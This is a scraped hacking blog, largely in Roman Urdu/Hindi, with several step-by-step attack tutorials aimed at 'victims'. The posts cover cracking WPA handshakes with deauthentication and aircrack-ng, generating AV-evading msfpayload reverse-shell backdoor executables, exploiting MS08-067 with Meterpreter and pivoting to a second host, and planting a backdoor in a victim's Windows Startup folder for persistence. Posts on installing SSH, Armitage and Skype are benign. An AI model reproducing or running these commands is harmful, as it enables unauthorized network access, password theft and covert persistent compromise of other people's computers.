Sunday 28 June 2015

How Hack Wifi WPA WEP WPA2 With Aircrack-ng in URDU HINDI



 AIRCRACK PASSWORDLIST AIRMON-NG ATTACK ""IN URDU""
 HOW CAPTURE .cap FILE ""IN URDU""
 HOW CAPTURE WIFI HANDSHAKE .cap FILE  ""IN URDU""
 HOW MAKE PERFECT AIRCRACK ATTACK  ""IN URDU""

ASSALAMOALIKUM MERY PAKISTANI HACKERS AJJ HUM WIFI KO HACK KARNA SEKHENGY JIS KI DETAIL YEA HAN..
NOTE >>>> Commands Sirf Red Colour Mein Han..
Artical Wrire By : Muhammad Qutab BuTT

1>AIRCRACK PASSWORDLIST AIRMON-NG ATTACK ""IN URDU""
 2>HOW CAPTURE .cap FILE ""IN URDU""
 3>HOW CAPTURE WIFI HANDSHAKE .cap  FILE ""IN URDU""
                                            4>HOW MAKE PERFECT AIRCRACK ATTACK  ""IN URDU""
Sab sy pehly hum apny modem ka interface check karengy command hy
iwconfig
is ky bad ap ko wlan0 ky samny ap ka interface show ho jay ga jo mon0 athk waghera ho sakta hy
interface check karny ky bad ap command dyngy

airmon-ng
us ky bad next command
airmon-ng stop wlan0
es ky bad next command
airodump-ng wlan0
es ky bad ap ky pass ap ky wifi connections show ho jayngy with channel aor bssid info
es ky bad jab ap ky victim ka connection with info show ho jay to ap Ctrl plus Alt marengy to wo stop ho jay ga waheen us ky bad
apny victim ki info ap ky samny hy ab next terminal open karengy aor command dyngy kuch aysy

airodump-ng --bssid 00:07:26:32:CB:AB -c 1 --write youfilename wlan0mon
 
Sab sy pahly es command ko dyny ka maqsad smajhty han es command ki maddad sy hum apny victim ky wifi ki handshake
file capture karngy jis ki maddad sy hum apna next setp mukammal karengy to jaisa ky es command mein airodump-ng ky bad--bssid
ky samny humary victim ki bssid hy jo ky hum nay es sy pichly step mein hasil ki thius ky bad -c1 ka matlab yea hy ky humara victim
channel 1 py hy yea info bhi humien pichly step mein mil gai thi us ky bad --write ky bad handshake<< ""Yea zaroori hy "" file ka jo name rakhna hy ap ki marzi us ky bad wlan0 jo ky mera interface hy jo ky hum nay iwconfig command sy hasil ki thi..
es ky bad jasy hi hum es command ko hit karengy kuch aysy karky yahan process start ho jay ga


CH  9 ][ Elapsed: 0 s ][ 2015-06-28 08:35                                        
                                                                                           
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                           
 00:07:26:32:CB:AB  -93        5        0    0  11  54   WPA2 CCMP   PSK  unkwnon             
                                                                                           
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                 
                                                                                            
 (not associated)   9C:02:98:87:3E:E5  -88    0 - 1      0        3


ab jasy hi yea process start hoga to humien jaldi hi next command box open karna hy aor handshake ky liye aysy command deni hy jasy hi hum apni handshake command dyngy wahan upar es line ky last mein automatic Hand shake likha howa aa jay ga jasy hi hand shake lika aa jay to humien alt plus ctrl mar ky process ko stop karna parega hand shake ki command yea hy CH  9 ][ Elapsed: 0 s ][ 2015-06-28 08:35 yahan Hand shake likha ayy ga
aireplay-ng --deauth 100 -a 00:07:26:32:CB:AB -c 24:09:95:39:1E:00 wlan0
es command mein -a ky samny humary victim ki bssid hy aor -c ky samny humary victim ka station hy jo ky last wali lines mein atta hy airodump wali command ky..
ab jasy hi humari handshake file creat ho jay gi to humien last command kuch aysy deni hy


aircrack-ng output-01.cap -w /root/Desktop/realuniq.lst
es command mein hum nay apny victim ki handhake file ko select kiya and apni wordlist ko select kiya hy.meri wordlist Desktop py pari hy aor name realuniq hy ap ki wordlist ka name aor us ka folder change hoga.
meri hand shake file ka name output-01.cap hy aor word list desktop py hy jis ka name realuniq.lst
hy ap ki output file ka name aor
wordlist ka name aor path change ho sakti hy wo ap apny mutabik dyngy jasy hi ap yea command hit karengy to ap ky pas kuch aysy process chalny lag jay ga aor ap ka password nikal jay ga us ki timing diffrent hoti hy kisi ka 1 din lagta kisi ka 1 hour kabhi kabhi
3/4 din bhi  lag jaty han to jitni bari wordlist hogi utni hi deer lagay ga passwd crack karny mein
 


[42:04:42] 18703828 keys tested (197.16 k/s)


                       Key Found: 1218118501                


      Master Key     : 90 34 61 74 E3 D9 CB C1 3A 7B 1E CA A4 5A EF 8E
                       48 C8 46 30 AC 97 80 1E 91 01 FA 6A CC C4 42 F5

      Transient Key  : 8E 74 C9 7E 10 2B 44 CB 1D 50 96 F2 96 00 12 84
                       9A 5B 44 2F 26 C0 EE 57 B6 BA 60 E8 FE 31 8A B5
                       A6 13 99 CC AB 88 03 B4 02 15 7D 91 D9 F2 31 56
                       22 AF 00 2F 66 09 EB 4B F2 93 E5 86 7D EF 16 67

      EAPOL HMAC     : 6B 0A 43 6B C7 D3 A4 9C BD 85 FC C1 0C 4A 5B A1


Enjoy :D



Source By:  http://linux-commands-backtrack.blogspot.com/

Write By >> @Muhammad QuTab BuTT

Wednesday 23 April 2014

Payload undetectable For Multi Computer

Step 1: Explore Msfpayload
Let’s start by exploring msfpayload as part of the Metasploit suite. By typing msfpayload with the –h switch, we can get the help screen on this module.

msfpayload -h

Notice in the screenshot above that the syntax for this module includes options, the payload, and then several values that enable us to encode the payload using various programming languages including C, Perl, Ruby, Raw, VBA and others.
Msfpayload enables us to convert the code of the payload into any of these choices and thereby better evade the victim’s AV software.

Step 2: Generate a Custom Payload

Let’s proceed to generate a customized payload in C.

msfpayload windows/shell/reverse_tcp -o



Notice that we used the –o option and Metasploit displays our various options. To generate the the customized payload we need to pass the options to Metasploit, in this case the LHOST and the LPORT. Let’s set those to our machine 192.168.100.1 and the LPORT to 4441.



We need to now generate a custom payload in C by typing:



msfpayload windows/shell/reverse_tcp LHOST=192.168.100.1 LPORT=4441 C



Notice that we appended the command with a capital C to indicate that we wanted the payload to be generated in C. As you can see from screenshot above, Metasploit generated the payload in C and displayed it to us.



Step 3: Generate the Binary Code



Finally, we need to generate a binary executable for the shellcode which can use in our client side attack.



msfpayload windows/shell/reverse_tcp LHOST=192.168.100.1 X > setup.exe



We have now created an executable file by using the X option and then sent this file to the current folder and named the file setup.exe. We can now use this new payload in a client-side attack and the victim’s AV software will be unlikely to have a signature for it, allowing us to stealthily place this backdoor/listener on their system.



And that's it! Stay tuned for my next lesson, where we'll explore ways to disable the client AV software altogether.

Monday 21 April 2014

How to Install SSH in Ubuntu

Steps

  1. First install SSHD (secure shell daemon) and client. Type in the following commands in a terminal session:
    sudo apt-get install openssh-server openssh-client
  2. Test your installation by connecting to your own server. Type in the following comand:
    ssh localhost
    or
    ssh your-username@your-server-ip-address
  3. Basically you connect to your SSH server by knowing three things: 1) your domain name or ip address, 2) your username, and 3) your password.
  4. If you are using another remote Linux terminal to connect to your SSH server you will type the following terminal commands:
    ssh your-username your-server-domain.name-or-ipaddress
    example: ssh dan somedomain.com
    or
    example: ssh dan@somedomain.com 
  5. If you are using a program like PuTTY in Windows to connect to your SSH server you will need to fill in your domain name or ip address and click "Open", after which you will be prompted for your username and password.   
  6. The terminal commands to start, stop and restart your sshd server are:
    sudo /etc/init.d/ssh start
    sudo /etc/init.d/ssh stop
    sudo /etc/init.d/ssh restart

Troubleshooting

If you are l having problems connecting to your SSH server from another remote computer it may be a firewall issue. By default SSH makes connections on port 22, so you will have to make sure port 22 is open on your Linux computer, and if you are connecting from another network that port forwarding is enabled on your local router/firewall device on port 22 as well.

Matasploit Attack on Other Network


Pivoting refers to the practice of hacking a network computer or server and then using that host to attack other computer systems from within the network. By launching attacks from within the network, the attacker bypasses firewall policy and can execute attacks that would not be possible from outside the network. By using a compromised system to launch attacks from, the attacker has an improved prospect of remaining undetected and can leave less of a fingerprint.


Exploit: 
              In the example pentest below, the goal is to exploit a host on the network and establish a hidden Meterpreter session, then using pivoting, exploit another host on the network..
Requirements: 
                                   The pentest exercise was conducted with the Backtrack5 VMware virtual machine against two hosts running WindowsXP Pro - Service Pack 2..

Exploit steps:




Open a terminal in Backtrack and enter the following commands:

#msfconsole
msf > show exploits
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show payloads
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
     PAYLOAD => windows/meterpreter/bind_tcp
msf exploit (ms08_067_netapi) > show options
msf exploit (ms08_067_netapi) > set RHOST <1st victim's ip address>
     RHOST => <ip address>
msf exploit (ms08_067_netapi) > exploit        //if you are successful, you will see a meterpreter prompt
meterpreter >                    //if you see this you have a Meterpreter shell
meterpreter > shell           //this will give you a Windows command prompt/shell
C:\WINDOWS\sytem32> exit             //exit out of the Windows command prompt
meterpreter > getpid                 //note the process id that Meterpreter is using
meterpreter > ps              //list all running process on the victim machine. What process does your PID shows up as? svchost.exe? Look for the process "lsass.exe" , it may show up as PID 700
meterpreter > migrate 700           //migrate Meterpreter to the lsass.exe process
meterpreter > getpid                     //verify your new process ID
ctrl+z                             //Key in ctrl+z to background the Meterpreter session
msf > route add <2nd victim's ip address> <subnet mask> <session id #>           //route a new attack to victim 2
msf > use windows/smb/ms08_067_netapi
msf exploit (ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit (ms08_067_netapi) > set RHOST <2nd victim's ip address>
msf exploit (ms08_067_netapi) > exploit
meterpreter >                           //success!!!!

Now that you have a meterpreter shell the sky is the limit. Run a help command to see all of the commands available to you. Try creating a directory or file on the victim machine, or uploading or downloading a file to and from the victim. Here are some of the basic meterpreter commands:..

     meterpreter > help                     //help menu

     meterpreter > background         //backgrounds the current session

     meterpreter > exit                      //terminate the meterpreter session

     meterpreter > quit                      //terminate the meterpreter session
     meterpreter > write                    //writes data to a channel
     meterpreter > mkdir                  //creates a directory
     meterpreter > download            //download a file or directory
     meterpreter > upload                //upload a file or directory
     meterpreter > search                //search for a file



           

Tuesday 1 April 2014

How do I run Armitage on Kali Linux?

How do I run Armitage on Kali Linux?

Armitage is not distributed with Kali Linux. It is in the Kali Linux repository though. To install it, type:
apt-get install armitage

2. I get a database error on Kali Linux. How do I fix it?

Make sure the database is running. Use:
service postgresql start
Next, you may need to ask Kali to recreate the Metasploit framework database:
service metasploit start 
service metasploit stop
Sometimes you need to do the above after an msfupdate as well.

3. Sometimes Armitage's menus stick (or I see graphic glitches)--how do I fix this?

Kali Linux comes with Java 1.6 and 1.7 pre-installed. Unfortunately, it defaults to Java 1.6 which has a few issues. You'll need to tell Kali Linux to use Java 1.7 by default. Here's how:
32-bit Kali Linux:
update-java-alternatives --jre -s java-1.7.0-openjdk-i386
64-bit Kali Linx:
update-java-alternatives --jre -s java-1.7.0-openjdk-amd64

Monday 24 March 2014

Hack Computer For Life Time In Urdu Hindi

Assalamoalikum wr wb , 

 Umeed hy ap sab theek hongy ,
       Well hum ajj sekhengy ky kasy hum kisi bhi pc ko Hack karty han wo bhi lifetime ky liye asan hi hy bas commands ko follow karny ky bjaye ap in sab Commands ko yad kar leyn to ziyada bahtar hoga aor samajh leyn 

Note " Sab commands Ky liye mein Red colour Use karonga And ap ki samajh mein a jay sath sath type karky btata bhi rahoonga...
Ap sab ka apna Dost      @Khaksaar 

To Sab sy pahly hum Armitage ko open karny ka tariqa sekhengy First Step Open Your Terminal And Type in >armitage < And Hit Enter.. 

Us Ky Bad Thora Intezar karny ky bad 1 choti si window khully gi jis mein Ip Add aor Port Likha ho ga us ko ok kar deyngy koi bhi changing nahi karengy again Yes or No Wala boX khully ga us Ko bhi Yes kar denna hy and thora sa Wait karny Ky Bad.. 
Humari BackTrack ki screen par humara Armitage open ho jay ga Us ky Bad armitage ko minimize Kar ky Choor Dyngy.. 
Aor Phir Hum Apni BackDoor File BnayengyJis ki maddad sy hum kisi ko bhi Hack Karengy Ess Commands ki Maddad Sy Aor Hum Jo File Bnayengy..
Wo File Humari Root Folder Mein Automatic Save HOo Jay Gi > > Backdoor File Bnany Ki Command Yea Hy..
Command > 
msfpayload windows/meterpreter/reverse_tcp LHOST=Your BackTrack Ifconfig ip LPORT=Your Port X > Your file name.exe

And Just HiT enter.. 
Thory sy process ky Bad ap ki file ban jay Gi..
               


                          """Important Notice"""

Mein apna Modem Use kar Raha hoon Es Liye Mein nay IfConfig Mein Sy apni Lan Ip LHOST ky samny donga and LPORT ky samny apna port Donga 
Port Forwording : 1 asan sa Tariqa hy Us katariqa Mein Alag Sy Tut Mein Bnna Kar Dy Doonga Khair Jo Log Wifi Use Kar Rahy Han Un Ko Apni Wlan wali ip LHOST KY SAMNY = Ky Bad Likhengy Yea Important Hy Warna Ap Ki File Kam Nahi Kary Gi... 


Humari File Ab Ban Chukki Hy Jo Ky Root Folder Mein Save Ho Gai Hy Ap Wahan Sy Apni File Ko Kaheen Sy Bhi Online Upload Kar Dyngy And Apna Shikar Dondengay Khair Ap Ki File Ban Chukki Hy Aor Ab Ap ko Apny Armitage Mein Ja Kar Upar Dekhna Hy 1 Option Ho Ga 


Armitage   ky name sy us ko khilengy and 5th wala option Listeners Mein Jayengy And wahan sy Reverse ( wait for ) par click karna hy Yahan Humien Apna Port Dena Hy Jo Hum Virtual mein bnayengy And >> Type << waly BoX mein >> Meterpreter << Yea select Karny Ky Bad Hum Wait Karty Han Ky Koi Us File Py Click Karta Hy Jasy Hi Ap Ki file Py koi Click Kary Ga Ap Ki Armitage Ki Nechy Black Screen Mein 1 Line Chal Jay Gi Like Aysy >>> 



Meterpreter session 3 opned ( Victim ip -> again ip ) at Date Time +0100 




Jab Humara Victim System show ho jay ga to hum us ko Life Time Ky Liye Hack Karengy Ky Wo Agar Kabhi system restart karta hy to ap ky pass us ka system Still Hack Rahy ga.. 
Us Ky Liye hum yea info command Use karengy  >>



C:\Users\username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup


                                           " Note "
Uper wali line  Command mein ap ko jo username nazar a raha hy White colour ka yahan hum apny victim ky Pc Ka User Name Dalengy username ki jagan like aysy next line mein change dekh leyn ap sab.. 



C:\Users\Your victim system name\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup 



Ab ap Sochengy ky user name khan sy ayy ga us ky liye hum jab system ko hack karty hn to wahan chota sa moniter show hota hy humien Victim ka us ky nichy puri detail hoti hy us ka username wahan sy dekh leyn so agy chalty han... 


Ab Humien Victim ki StartUp Directory Mein jana hy aor humary Pass Command yan Location code a chukka hy to Hum Ab apny 
                              BackTrack Armitage ki window kholengy aor apny Victim ky pc par Right Click Karengy aor wahan sy 1st Option Meterpteter 2 mein jayiengy phir 3rd option Explore mein jayengy and Browse Files 
                          Par Click Karty Hi Humary Pas Armitage Ki window mein nechy Pannel khul jay ga wahan hum apni yea wali command dalengy aor enter marenGy 

Command > 

C:\Users\Your victim system name\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

Us Ky Bad Humien Ini File Nazar Ayy Gi Aor Yahn Es Folder Mein Hum Apna BackDoor Ki File Ko Upload Ky Option Ki Madad Sy Upload Karengy..


Ab Jasy Hi Humari File uPload ho jay gi Es Folder Mein to System Hack Rahy Ga Hamesha Ky Liye Aor Hamesha Restart Hony Par Yea Humari BackDoor File Ko Automatic Run Kar Diya Kary Ga.. Ajj Ky Liye Bass Itna Hi Umeed Hy Ap Ko Samajh Aaa Jay Gi Jald Hi..
                           
                                             InshAllah.. 





Note : Wo Commands Jo Hum Nay Lgani Han Un Ko Mein Red Colour Mein Type Karonga 




Source : http://linux-commands-backtrack.blogspot.com 



Port Forwording Ky Liye Mein Jald Hi Web Site Py TuT Bnna Donga.. 
                         Thanks.. 

  





    PAKISTAN ZINDABAD PAKISTAN PAINDABAD

Thursday 20 March 2014

How To Creat WordList In BackTrack Crunch With Commands

Assalamoalikum wr wb , 
Acha To Hum Sab Ajj Word List Bnana Sekhengy To Start Karty Han Apna Terminal Kholien Command Ka Aor 1st Command Sy Start Kar Deyn Ap Ki Word List Ban Jayengi But Es Ka Apna 1 Folder Hy Jahan Yea Sab Save Hoga >> Root <<  Mein Ja Kar  >> Pentest >> Passwords >> Crunch << Es Folder mein ap ki wordlist Save Rahy Gi Aor Yahan Sy Hi Hum Es Ko Select Karngy Kaheen Bhi Apny Faidy Ky Liye.
                 Thanks..



Commands Nechy Line Sy Start HonGi..


cd /pentest/passwords/crunch/
ls
./crunch 10 10 1234567890 -t 0599@@@@@@ -o wordlist.lst
./crunch 1 5 1234567 -o wordlist.lst
./crunch 1 5 1234567 -o wordlist2.lst





Ab Ap Ki Wordlist Ki 3 List Hum Nay Bnaa Li Han Jo Humien Wifii Aor Bouth Sy 
Password Hack Karny Mein Madad Kary Gi..

Source : http://linux-commands-backtrack.blogspot.comhttp://linux-commands-backtrack.blogspot.com



Wednesday 19 March 2014

Back Track 5r3 Remote System Hack With Ip Address


Sab sy pahly hum terminal mein command dyngy >   msfconsole
Again new open karien terminal ko and apni ip check karien >  Command > ifconfig
phir ap nay msfconsole ky khul jany ky bad yea command deni hy> show exploits << phir yea process  complete hoga and ap ko nechy wali line dondni hy aor copy karni hy
use windows/smb/ns08 067 netapi
es ky bad command hy >  show options
phir  >  set rhost and victam ip  and enter
phir > show options
phir > set payload windows/vncinject/bind_tcp
phir > show options
phir > exploit
phir enjoy victam ka pc ap ky samny hy....Lolls..

Note :  Commands sirf Red Colour mein han 
Material : http://linux-commands-backtrack.blogspot.com

Saturday 15 March 2014

how install Skype in linux commands Back Track 5r3

Hi Guys !  Sab sy pahly ap logoon ko skype ki web site sy skype download karna parega and..

us ky bad ap ko pata hona cahiye skype debain x64 x64=32 bit so hum Debain ka like 2014 mein yea version best hy ( skype-debian_4.2.0.13-1_i386.deb ) yea apny kisi bhi folder mein save karien roob mein yan desktop py last command.. 

Last Command ka tariqa asan hy waheen sab sy ghalti hoti hy..   

Command yea hy >>    dpkg -i skype-debian_4.2.0.13-1_i386.deb 

And Hit Enter ap ka shype chal jay ga....


apt-get install -f
aptitude install lib32stdc++6 lib32asound2 ia32-libs libc6-i386 lib32gcc1 ia32-libs-gtk


aptitude search ia32-libs


dpkg -i and drag your debain 70 skype file in command box

let it done enjoy..
By - sSs